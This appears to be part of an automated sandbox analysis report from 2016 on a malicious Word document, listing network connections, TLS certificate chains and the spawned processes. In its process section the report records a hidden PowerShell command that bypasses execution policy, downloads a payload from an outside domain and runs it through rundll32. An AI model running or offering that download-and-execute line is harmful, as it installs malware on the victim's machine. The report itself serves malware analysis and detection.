Timestamp | Source Port | Dest Port | Source IP | Dest IP | Header | Total Bytes Transferred (KB) |
---|---|---|---|---|---|---|
Sep 22, 2016 14:20:50.956690073 CEST | 49179 | 80 | 192.168.1.16 | 84.246.227.126 | 14 | |
Sep 22, 2016 14:20:52.225730896 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 | 14 | |
Sep 22, 2016 14:20:52.427665949 CEST | 80 | 49179 | 84.246.227.126 | 192.168.1.16 | 15 |
HTTPS Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Subject | Issuer | Not Before | Not After | Key / Signature / Constraints |
---|---|---|---|---|---|---|---|---|---|
Sep 22, 2016 14:20:44.379561901 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 | CN=*.maxmind.com, OU=PremiumSSL Wildcard, O=MaxMind Inc., STREET=14 Spring Street, STREET=3rd Floor, L=Waltham, ST=MA, OID.2.5.4.17=02451, C=US | CN=COMODO RSA Organization Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon Sep 19 02:00:00 CEST 2016 | Thu Nov 01 00:59:59 CET 2018 | V3, RSA 2048 bits, SHA256withRSA, CA:false, KeyUsage DigitalSignature Key_Encipherment, EKU serverAuth clientAuth, SAN *.maxmind.com and maxmind.com |
Sep 22, 2016 14:20:44.379561901 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 | CN=COMODO RSA Organization Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Wed Feb 12 01:00:00 CET 2014 | Mon Feb 12 00:59:59 CET 2029 | V3, RSA 2048 bits, SHA384withRSA, CA:true PathLen:0, KeyUsage DigitalSignature Key_CertSign Crl_Sign, EKU serverAuth clientAuth |
Sep 22, 2016 14:20:44.379561901 CEST | 443 | 49178 | 104.16.38.47 | 192.168.1.16 | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE | Tue May 30 12:48:38 CEST 2000 | Sat May 30 12:48:38 CEST 2020 | V3, RSA 4096 bits, SHA384withRSA, CA:true, KeyUsage DigitalSignature Key_CertSign Crl_Sign |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 14:21:10 |
Start date: | 22/09/2016 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | unknown |
Imagebase: | 0x2f210000 |
File size: | 1422168 bytes |
MD5 hash: | 113371C5AC72FCE072F707C55E7845B9 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 14:21:28 |
Start date: | 22/09/2016 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -c $tmp=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://ebusiness-expert.eu/mso/onedrive' $tmp);rundll32 $tmp DllRegisterServer |
Imagebase: | 0x77120000 |
File size: | 452608 bytes |
MD5 hash: | 92F44E405DB16AC55D97E3BFE3B132FA |
Programmed in: | .Net C# or VB.NET |
General |
---|
Start time: | 14:21:35 |
Start date: | 22/09/2016 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Windows\system32\rundll32.exe C:\Users\admin\AppData\Local\Temp\tmpC4E1.tmp DllRegisterServer |
Imagebase: | 0xff0000 |
File size: | 44544 bytes |
MD5 hash: | 51138BEEA3E2C21EC44D0932C71762A8 |
Programmed in: | C, C++ or other language |
Disassembly |
---|
Code Analysis |
---|